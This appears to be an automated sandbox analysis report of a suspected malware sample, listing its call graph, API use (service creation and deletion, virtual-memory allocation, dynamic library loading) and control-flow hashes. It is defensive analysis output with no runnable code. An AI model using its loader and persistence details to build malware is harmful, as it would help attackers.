14043->14044 14045 14000852a GetProcAddress 14043->14045 14045->14044 14046 14000853f 14045->14046 14046->14044 14048 14000a334 14047->14048 14049 14000a339 HeapSetInformation 14047->14049 14048->13988 14049->13988 14178 140008370 14050->14178 14052 140009f8a 14053 14000a17c 14052->14053 14055 140008370 3 API calls 14052->14055 14057 14000a0e3 14052->14057 14062 140005c48 14052->14062 14054 14000a1c4 GetStdHandle 14053->14054 14056 14000a239 SetHandleCount 14053->14056 14058 14000a1d8 GetFileType 14053->14058 14061 14000edc0 _lock 3 API calls 14053->14061 14053->14062 14054->14053 14055->14052 14056->14062 14057->14053 14059 14000a11c GetFileType 14057->14059 14057->14062 14183 14000edc0 14057->14183 14058->14053 14059->14057 14061->14053 14062->14005 14063 1400084e0 14062->14063 14064 140009540 _lock 12 API calls 14063->14064 14065 1400084ed 14064->14065 14066 140009300 _lock 10 API calls 14065->14066 14067 1400084f4 14066->14067 14068 1400073e0 _lock LdrLoadDll 14067->14068 14069 140008500 14068->14069 14071 140009e7c 14070->14071 14072 140009e3e GetCommandLineW 14070->14072 14075 140009e81 GetCommandLineW 14071->14075 14076 140009e69 14071->14076 14073 140009e49 GetCommandLineW 14072->14073 14074 140009e5e GetLastError 14072->14074 14073->14074 14074->14076 14077 140009e75 14074->14077 14075->14076 14076->14077 14078 140009e91 GetCommandLineA MultiByteToWideChar 14076->14078 14077->14008 14079 140009ec8 14078->14079 14080 140009ed9 14078->14080 14079->14008 14081 140008370 3 API calls 14080->14081 14082 140009eeb 14081->14082 14083 140009f32 14082->14083 14084 140009ef3 MultiByteToWideChar 14082->14084 14083->14008 14085 140009f13 14084->14085 14086 140009f2a 14084->14086 14085->14008 14197 140008de0 14086->14197 14089 140009c52 GetEnvironmentStringsW 14088->14089 14092 140009c86 14088->14092 14090 140009c6c GetLastError 14089->14090 14097 140009c60 14089->14097 14090->14092 14093 140009c77 14090->14093 14091 140009c91 GetEnvironmentStringsW 14095 140005c67 14091->14095 14091->14097 14092->14091 14092->14093 14094 140009d09 GetEnvironmentStrings 14093->14094 14093->14095 14094->14095 14096 140009d17 14094->14096 14114 1400099c0 GetModuleFileNameW 14095->14114 14099 140009d58 14096->14099 14101 140009d20 MultiByteToWideChar 14096->14101 14097->14097 14202 140008300 14097->14202 14102 140008370 3 API calls 14099->14102 14101->14095 14101->14096 14103 140009d68 14102->14103 14106 140009d7d 14103->14106 14107 140009d70 FreeEnvironmentStringsA 14103->14107 14104 140009ce1 __CxxFrameHandler 14109 140009cef FreeEnvironmentStringsW 14104->14109 14105 140009cd1 FreeEnvironmentStringsW 14105->14095 14108 140009de5 FreeEnvironmentStringsA 14106->14108 14110 140009d90 MultiByteToWideChar 14106->14110 14107->14095 14108->14095 14109->14095 14110->14106 14111 140009e0e 14110->14111 14112 140008de0 _lock 2 API calls 14111->14112 14113 140009e16 FreeEnvironmentStringsA 14112->14113 14113->14095 14117 140009a03 14114->14117 14115 140008300 _lock 17 API calls 14116 140009bca 14115->14116 14116->14012 14117->14115 14117->14116 14119 1400096a8 14118->14119 14120 1400096b2 14118->14120 14119->14016 14121 140008370 3 API calls 14120->14121 14129 1400096fa 14121->14129 14122 140009709 14122->14016 14123 1400097a5 14124 140008de0 _lock 2 API calls 14123->14124 14125 1400097b4 14124->14125 14125->14016 14126 140008370 3 API calls 14126->14129 14127 1400097e5 14128 140008de0 _lock 2 API calls 14127->14128 14128->14125 14129->14122 14129->14123 14129->14126 14129->14127 14131 140008666 14130->14131 14133 1400086bf 14131->14133 14218 140005380 14131->14218 14133->14020 14135 140001565 14134->14135 14136 140001569 14135->14136 14137 14000157e 14135->14137 14256 140001430 GetModuleFileNameW OpenSCManagerW 14136->14256 14140 140001595 OpenSCManagerW 14137->14140 14141 14000164f 14137->14141 14142 1400015b2 GetLastError 14140->14142 14143 1400015cf OpenServiceW 14140->14143 14144 140001654 14141->14144 14145 140001669 StartServiceCtrlDispatcherW 14141->14145 14142->13987 14147 140001611 DeleteService 14143->14147 14148 1400015e9 GetLastError CloseServiceHandle 14143->14148 14265 1400011f0 14144->14265 14145->13987 14150 140001626 CloseServiceHandle CloseServiceHandle 14147->14150 14151 14000161e GetLastError 14147->14151 14148->13987 14150->13987 14151->14150 14153 14000f01e _lock 14152->14153 14154 14000f03b LoadLibraryA 14153->14154 14155 14000f125 _lock 14153->14155 14156 14000f054 GetProcAddress 14154->14156 14157 1400094c9 14154->14157 14159 14000f165 14155->14159 14175 1400073e0 LdrLoadDll 14155->14175 14156->14157 14158 14000f06d _lock 14156->14158 14157->13983 14163 14000f075 GetProcAddress 14158->14163 14162 1400073e0 _lock LdrLoadDll 14159->14162 14173 14000f1a3 _lock 14159->14173 14161 1400073e0 _lock LdrLoadDll 14161->14157 14168 14000f1e9 14162->14168 14165 140007220 _lock 14163->14165 14167 14000f094 GetProcAddress 14165->14167 14166 1400073e0 _lock LdrLoadDll 14166->14159 14170 14000f0b3 _lock 14167->14170 14169 1400073e0 _lock LdrLoadDll 14168->14169 14168->14173 14169->14173 14170->14155 14171 14000f0e9 GetProcAddress 14170->14171 14172 14000f101 _lock 14171->14172 14172->14155 14174 14000f10d GetProcAddress 14172->14174 14173->14161 14174->14155 14176 140007333 14175->14176 14176->14175 14177 140007403 14176->14177 14177->14166 14179 1400083a0 14178->14179 14181 1400083e0 14179->14181 14182 1400083be Sleep 14179->14182 14189 14000e850 14179->14189 14181->14052 14182->14179 14182->14181 14184 1400073e0 _lock LdrLoadDll 14183->14184 14185 14000edec _lock 14184->14185 14186 14000ee1d _lock 14185->14186 14187 14000ee26 GetModuleHandleA 14185->14187 14186->14057 14187->14186 14188 14000ee38 GetProcAddress 14187->14188 14188->14186 14190 14000e865 14189->14190 14191 14000e8be HeapAlloc 14190->14191 14193 14000e876 sprintf_s 14190->14193 14194 1400090b0 14190->14194 14191->14190 14191->14193 14193->14179 14195 1400073e0 _lock LdrLoadDll 14194->14195 14196 1400090c5 14195->14196 14196->14190 14198 140008de9 HeapFree 14197->14198 14201 140008e19 _lock 14197->14201 14199 140008dff sprintf_s 14198->14199 14198->14201 14200 140008e09 GetLastError 14199->14200 14200->14201 14201->14083 14203 140008320 14202->14203 14205 140008358 14203->14205 14206 140008338 Sleep 14203->14206 14207 1400090f0 14203->14207 14205->14104 14205->14105 14206->14203 14206->14205 14208 14000919e 14207->14208 14213 140009103 14207->14213 14209 1400090b0 _lock LdrLoadDll 14208->14209 14210 1400091a3 sprintf_s 14209->14210 14210->14203 14211 14000914c HeapAlloc 14211->14213 14216 140009173 sprintf_s 14211->14216 14212 140009540 _lock 12 API calls 14212->14213 14213->14211 14213->14212 14214 1400090b0 _lock LdrLoadDll 14213->14214 14215 140009300 _lock 10 API calls 14213->14215 14213->14216 14217 140008510 _lock 3 API calls 14213->14217 14214->14213 14215->14213 14216->14203 14217->14213 14221 140005250 14218->14221 14220 140005389 14220->14133 14222 140005271 14221->14222 14223 1400073e0 _lock LdrLoadDll 14222->14223 14224 14000527e 14223->14224 14225 1400073e0 _lock LdrLoadDll 14224->14225 14226 14000528d 14225->14226 14232 1400052f0 _lock 14226->14232 14233 140008490 14226->14233 14228 1400052b5 14229 1400052d9 14228->14229 14228->14232 14236 140008400 14228->14236 14231 140008400 7 API calls 14229->14231 14229->14232 14231->14232 14232->14220 14234 1400084c5 HeapSize 14233->14234 14235 140008499 sprintf_s 14233->14235 14235->14228 14238 140008430 14236->14238 14239 140008472 14238->14239 14240 140008450 Sleep 14238->14240 14241 14000e920 14238->14241 14239->14229 14240->14238 14240->14239 14242 14000e935 14241->14242 14243 14000e94c 14242->14243 14254 14000e95e 14242->14254 14245 140008de0 _lock 2 API calls 14243->14245 14244 14000e9b1 14247 1400090b0 _lock LdrLoadDll 14244->14247 14248 14000e951 14245->14248 14246 14000e973 HeapReAlloc 14250 14000e9b9 _lock sprintf_s 14246->14250 14246->14254 14247->14250 14248->14238 14249 14000e9f4 sprintf_s 14252 14000e9f9 GetLastError 14249->14252 14250->14238 14251 1400090b0 _lock LdrLoadDll 14251->14254 14252->14250 14253 14000e9db sprintf_s 14255 14000e9e0 GetLastError 14253->14255 14254->14244 14254->14246 14254->14249 14254->14251 14254->14253 14255->14250 14257 140001482 CreateServiceW 14256->14257 14258 14000147a GetLastError 14256->14258 14260 1400014ea GetLastError 14257->14260 14261 1400014df CloseServiceHandle 14257->14261 14259 1400014fd 14258->14259 14271 140004f30 14259->14271 14263 1400014f2 CloseServiceHandle 14260->14263 14261->14263 14263->14259 14264 14000150d 14264->13987 14266 1400011fa 14265->14266 14280 1400051d0 14266->14280 14269 140004f30 sprintf_s NtAllocateVirtualMemory 14270 140001262 14269->14270 14270->13987 14272 140004f39 _CreateFrameInfo 14271->14272 14273 140004f44 14272->14273 14276 140006c95 14272->14276 14273->14264 14275 14000660e sprintf_s 14275->14264 14277 140006d9d 14276->14277 14278 140006d7b 14276->14278 14277->14275 14278->14277 14279 140006f95 NtAllocateVirtualMemory 14278->14279 14279->14277 14283 140008270 14280->14283 14282 140001238 MessageBoxW 14282->14269 14284 14000827e 14283->14284 14285 1400082ac sprintf_s 14283->14285 14284->14285 14287 140008120 14284->14287 14285->14282 14288 14000816a 14287->14288 14292 14000813b sprintf_s 14287->14292 14290 1400081d7 14288->14290 14288->14292 14293 140007f50 14288->14293 14291 140007f50 sprintf_s 54 API calls 14290->14291 14290->14292 14291->14292 14292->14285 14301 140007f69 sprintf_s 14293->14301 14294 140007f74 sprintf_s 14294->14290 14295 14000801d 14296 1400080d5 14295->14296 14297 14000802f 14295->14297 14298 14000cc00 sprintf_s 54 API calls 14296->14298 14299 14000804c 14297->14299 14302 140008081 14297->14302 14304 140008056 14298->14304 14309 14000cc00 14299->14309 14301->14294 14301->14295 14306 14000cd50 14301->14306 14302->14304 14317 14000c2a0 14302->14317 14304->14290 14307 140008300 _lock 17 API calls 14306->14307 14308 14000cd6a 14307->14308 14308->14295 14310 14000cc3f 14309->14310 14316 14000cc23 sprintf_s 14309->14316 14310->14316 14325 14000fc50 14310->14325 14314 14000ccc5 sprintf_s 14370 14000fd20 LeaveCriticalSection 14314->14370 14316->14304 14318 14000c2e0 14317->14318 14321 14000c2c3 sprintf_s 14317->14321 14319 14000fc50 sprintf_s 25 API calls 14318->14319 14318->14321 14320 14000c34e 14319->14320 14322 14000c1f0 sprintf_s 2 API calls 14320->14322 14323 14000c367 sprintf_s 14320->14323 14321->14304 14322->14323 14404 14000fd20 LeaveCriticalSection 14323->14404 14326 14000fc96 14325->14326 14327 14000fccb 14325->14327 14371 14000b400 14326->14371 14329 14000ccac 14327->14329 14330 14000fccf EnterCriticalSection 14327->14330 14329->14314 14335 14000c3f0 14329->14335 14330->14329 14338 14000c42e 14335->14338 14354 14000c427 sprintf_s 14335->14354 14336 140004f30 sprintf_s NtAllocateVirtualMemory 14337 14000cbe6 14336->14337 14337->14314 14341 14000c4fb sprintf_s _CreateFrameInfo 14338->14341 14338->14354 14398 14000c1f0 14338->14398 14340 14000c841 14342 14000c86a 14340->14342 14343 14000cb20 WriteFile 14340->14343 14341->14340 14345 14000c526 GetConsoleMode 14341->14345 14344 14000c936 14342->14344 14350 14000c876 14342->14350 14346 14000cb53 GetLastError 14343->14346 14343->14354 14351 14000c940 14344->14351 14360 14000ca02 14344->14360 14345->14340 14347 14000c557 14345->14347 14346->14354 14347->14340 14348 14000c564 GetConsoleCP 14347->14348 14348->14354 14366 14000c581 sprintf_s 14348->14366 14349 14000c8c5 WriteFile 14349->14350 14352 14000c928 GetLastError 14349->14352 14350->14349 14350->14354 14351->14354 14355 14000c991 WriteFile 14351->14355 14352->14354 14353 14000ca57 WideCharToMultiByte 14356 14000cb15 GetLastError 14353->14356 14353->14360 14354->14336 14355->14351 14357 14000c9f4 GetLastError 14355->14357 14356->14354 14357->14354 14358 14000cab0 WriteFile 14359 14000caf6 GetLastError 14358->14359 14358->14360 14359->14354 14359->14360 14360->14353 14360->14354 14360->14358 14361 14000fd50 7 API calls sprintf_s 14361->14366 14362 14000c649 WideCharToMultiByte 14362->14354 14363 14000c68c WriteFile 14362->14363 14364 14000c80d GetLastError 14363->14364 14363->14366 14364->14354 14365 14000c829 GetLastError 14365->14354 14366->14354 14366->14361 14366->14362 14366->14365 14367 14000c6e2 WriteFile 14366->14367 14369 14000c81b GetLastError 14366->14369 14367->14366 14368 14000c7ff GetLastError 14367->14368 14368->14354 14369->14354 14372 14000b41e 14371->14372 14373 14000b42f EnterCriticalSection 14371->14373 14377 14000b2f0 14372->14377 14375 14000b423 14375->14373 14376 1400084e0 _lock 12 API calls 14375->14376 14376->14373 14378 14000b317 14377->14378 14379 14000b32e 14377->14379 14380 140009540 _lock 12 API calls 14378->14380 14382 140008300 _lock 17 API calls 14379->14382 14385 14000b342 sprintf_s 14379->14385 14381 14000b31c 14380->14381 14384 140009300 _lock 10 API calls 14381->14384 14383 14000b350 14382->14383 14383->14385 14387 14000b400 _lock 22 API calls 14383->14387 14386 14000b324 14384->14386 14385->14375 14388 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14386->14388 14389 14000b371 14387->14389 14388->14379 14390 14000b3a7 14389->14390 14391 14000b379 14389->14391 14392 140008de0 _lock HeapFree GetLastError 14390->14392 14393 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14391->14393 14397 14000b392 sprintf_s 14392->14397 14394 14000b386 14393->14394 14396 140008de0 _lock HeapFree GetLastError 14394->14396 14394->14397 14395 14000b3b0 LeaveCriticalSection 14395->14385 14396->14397 14397->14395 14399 14000c20c sprintf_s 14398->14399 14400 14000c22c SetFilePointer 14399->14400 14402 14000c212 sprintf_s 14399->14402 14401 14000c24a GetLastError 14400->14401 14403 14000c254 sprintf_s 14400->14403 14401->14403 14402->14341 14403->14341 16268 7ffb23b011b0 16273 7ffb23b01209 16268->16273 16269 7ffb23b01b70 BuildCatchObjectHelperInternal 8 API calls 16272 7ffb23b014d3 16269->16272 16270 7ffb23b01b90 51 API calls 16286 7ffb23b01300 BuildCatchObjectHelperInternal 16270->16286 16271 7ffb23b014f0 16301 7ffb23b01a40 16271->16301 16273->16271 16275 7ffb23b012c7 16273->16275 16276 7ffb23b0129e 16273->16276 16280 7ffb23b012b9 BuildCatchObjectHelperInternal 16273->16280 16273->16286 16277 7ffb23b01b90 51 API calls 16275->16277 16278 7ffb23b014f6 16276->16278 16287 7ffb23b01b90 16276->16287 16277->16280 16304 7ffb23b01110 16278->16304 16280->16270 16284 7ffb23b014eb 16296 7ffb23b079cc 16284->16296 16286->16269 16289 7ffb23b01b9b 16287->16289 16288 7ffb23b012b0 16288->16280 16288->16284 16289->16288 16290 7ffb23b07a4c Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 16289->16290 16291 7ffb23b01bba 16289->16291 16290->16289 16294 7ffb23b01bc5 16291->16294 16310 7ffb23b021f0 16291->16310 16293 7ffb23b01110 Concurrency::cancel_current_task 51 API calls 16295 7ffb23b01bcb 16293->16295 16294->16293 16297 7ffb23b07844 _invalid_parameter_noinfo 47 API calls 16296->16297 16298 7ffb23b079e5 16297->16298 16299 7ffb23b079fc _invalid_parameter_noinfo_noreturn 17 API calls 16298->16299 16300 7ffb23b079fa 16299->16300 16314 7ffb23b01b34 16301->16314 16305 7ffb23b0111e Concurrency::cancel_current_task 16304->16305 16306 7ffb23b03990 Concurrency::cancel_current_task 2 API calls 16305->16306 16307 7ffb23b0112f 16306->16307 16308 7ffb23b0379c __std_exception_copy 49 API calls 16307->16308 16309 7ffb23b01159 16308->16309 16311 7ffb23b021fe Concurrency::cancel_current_task 16310->16311 16312 7ffb23b03990 Concurrency::cancel_current_task 2 API calls 16311->16312 16313 7ffb23b0220f 16312->16313 16319 7ffb23b01ab0 16314->16319 16317 7ffb23b03990 Concurrency::cancel_current_task 2 API calls 16318 7ffb23b01b56 16317->16318 16320 7ffb23b0379c __std_exception_copy 49 API calls 16319->16320 16321 7ffb23b01ae4 16320->16321 16321->16317 13970 140006c95 13971 140006d9d 13970->13971 13972 140006d7b 13970->13972 13972->13971 13973 140006f95 NtAllocateVirtualMemory 13972->13973 13973->13971 14405 1400054e0 14406 14000552c 14405->14406 14409 140005506 sprintf_s 14405->14409 14418 1400074d0 14406->14418 14410 140008370 3 API calls 14414 140005545 _CreateFrameInfo 14410->14414 14411 1400055b8 14412 140008de0 _lock 2 API calls 14411->14412 14413 1400055c0 sprintf_s 14412->14413 14413->14409 14414->14411 14422 1400074f0 14414->14422 14417 1400055b0 GetLastError 14417->14411 14419 140007333 14418->14419 14420 140005536 14419->14420 14421 1400073e0 LdrLoadDll 14419->14421 14420->14410 14421->14419 14424 140007333 14422->14424 14423 140005561 CreateThread 14423->14413 14423->14417 14424->14423 14425 1400073e0 LdrLoadDll 14424->14425 14425->14424

                                            Executed Functions

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 153 140006f89-140006f8e 151->153 154 140006eef-140006f23 151->154 157 140006f95-140006fd6 NtAllocateVirtualMemory 153->157 158 140006f90 153->158 155 140006f25-140006f2d 154->155 156 140006f2f-140006f33 154->156 160 140006f37-140006f7a 155->160 156->160 157->132 159 140006fdc-140007020 157->159 158->132 161 14000702c-140007037 159->161 162 140006f84 160->162 163 140006f7c-140006f80 160->163 164 140007039-140007058 161->164 165 14000705a-140007062 161->165 162->151 163->162 164->161 168 14000706e-14000707b 165->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 173 140007096-1400070a9 169->173 174 1400070ab 169->174 171 1400072e2-1400072eb 170->171 172 140007164-14000717a 170->172 172->171 173->174 175 1400070ad-1400070db 173->175 176 140007064-14000706a 174->176 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@
                                            • API String ID: 0-149943524
                                            • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                            • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                            • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                            • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 270 1400074b4 265->270 271 140007480-1400074b3 265->271 267 1400074eb-14000752b 266->267 268 14000752c-140007535 266->268 267->268 272 140007552 268->272 273 140007537-140007554 268->273 270->268 271->270 272->260 273->264 274->256 275->260
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                            • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                            • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                            • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: File$CreateReadmalloc
                                            • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                            • API String ID: 3950102678-3381721293
                                            • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                            • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                            • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                            • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 25 7ffb23b01c00-7ffb23b01c06 26 7ffb23b01c08-7ffb23b01c0b 25->26 27 7ffb23b01c41-7ffb23b01c4b 25->27 29 7ffb23b01c35-7ffb23b01c74 call 7ffb23b02470 26->29 30 7ffb23b01c0d-7ffb23b01c10 26->30 28 7ffb23b01d68-7ffb23b01d7d 27->28 34 7ffb23b01d7f 28->34 35 7ffb23b01d8c-7ffb23b01da6 call 7ffb23b02304 28->35 47 7ffb23b01c7a-7ffb23b01c8f call 7ffb23b02304 29->47 48 7ffb23b01d42 29->48 32 7ffb23b01c28 __scrt_dllmain_crt_thread_attach 30->32 33 7ffb23b01c12-7ffb23b01c15 30->33 36 7ffb23b01c2d-7ffb23b01c34 32->36 38 7ffb23b01c17-7ffb23b01c20 33->38 39 7ffb23b01c21-7ffb23b01c26 call 7ffb23b023b4 33->39 40 7ffb23b01d81-7ffb23b01d8b 34->40 45 7ffb23b01da8-7ffb23b01dd9 call 7ffb23b0242c call 7ffb23b022d4 call 7ffb23b027b4 call 7ffb23b025d0 call 7ffb23b025f4 call 7ffb23b0245c 35->45 46 7ffb23b01ddb-7ffb23b01e0c call 7ffb23b02630 35->46 39->36 45->40 57 7ffb23b01e0e-7ffb23b01e14 46->57 58 7ffb23b01e1d-7ffb23b01e23 46->58 60 7ffb23b01d5a-7ffb23b01d67 call 7ffb23b02630 47->60 61 7ffb23b01c95-7ffb23b01ca6 call 7ffb23b02374 47->61 51 7ffb23b01d44-7ffb23b01d59 48->51 57->58 62 7ffb23b01e16-7ffb23b01e18 57->62 63 7ffb23b01e65-7ffb23b01e6d call 7ffb23b01720 58->63 64 7ffb23b01e25-7ffb23b01e2f 58->64 60->28 77 7ffb23b01ca8-7ffb23b01ccc call 7ffb23b02778 call 7ffb23b022c4 call 7ffb23b022e8 call 7ffb23b07b10 61->77 78 7ffb23b01cf7-7ffb23b01d01 call 7ffb23b025d0 61->78 68 7ffb23b01f02-7ffb23b01f0f 62->68 79 7ffb23b01e72-7ffb23b01e7b 63->79 69 7ffb23b01e36-7ffb23b01e3c 64->69 70 7ffb23b01e31-7ffb23b01e34 64->70 75 7ffb23b01e3e-7ffb23b01e44 69->75 70->75 84 7ffb23b01e4a-7ffb23b01e5f call 7ffb23b01c00 75->84 85 7ffb23b01ef8-7ffb23b01f00 75->85 77->78 127 7ffb23b01cce-7ffb23b01cd5 __scrt_dllmain_after_initialize_c 77->127 78->48 101 7ffb23b01d03-7ffb23b01d0f call 7ffb23b02620 78->101 80 7ffb23b01eb3-7ffb23b01eb5 79->80 81 7ffb23b01e7d-7ffb23b01e7f 79->81 90 7ffb23b01eb7-7ffb23b01eba 80->90 91 7ffb23b01ebc-7ffb23b01ed1 call 7ffb23b01c00 80->91 81->80 88 7ffb23b01e81-7ffb23b01ea3 call 7ffb23b01720 call 7ffb23b01d68 81->88 84->63 84->85 85->68 88->80 121 7ffb23b01ea5-7ffb23b01eaa 88->121 90->85 90->91 91->85 110 7ffb23b01ed3-7ffb23b01edd 91->110 112 7ffb23b01d35-7ffb23b01d40 101->112 113 7ffb23b01d11-7ffb23b01d1b call 7ffb23b02538 101->113 117 7ffb23b01ee4-7ffb23b01ef2 110->117 118 7ffb23b01edf-7ffb23b01ee2 110->118 112->51 113->112 126 7ffb23b01d1d-7ffb23b01d2b 113->126 122 7ffb23b01ef4 117->122 118->122 121->80 122->85 126->112 127->78 128 7ffb23b01cd7-7ffb23b01cf4 call 7ffb23b07acc 127->128 128->78
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                            • Instruction ID: 59fc45f7738aa4575cac95f1b0459cd7b98154e2ec733857b602e3feec6def0d
                                            • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                            • Instruction Fuzzy Hash: 0381AEACE182C746F61A9F75DC8937D6290AF45780F0C81B5EACD6B792DE2CE54A8700

                                            Control-flow Graph

                                            APIs
                                            • FreeConsole.KERNEL32 ref: 00007FFB23B01753
                                            • FreeLibrary.KERNEL32 ref: 00007FFB23B01981
                                              • Part of subcall function 00007FFB23B01B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFB23B01BC0
                                              • Part of subcall function 00007FFB23B01B90: Concurrency::cancel_current_task.LIBCPMT ref: 00007FFB23B01BC6
                                              • Part of subcall function 00007FFB23B01720: FindFirstFileA.KERNELBASE ref: 00007FFB23B01536
                                            Strings
                                            • WordpadFilter.db, xrefs: 00007FFB23B01527
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                            • String ID: WordpadFilter.db
                                            • API String ID: 868324331-3647581008
                                            • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
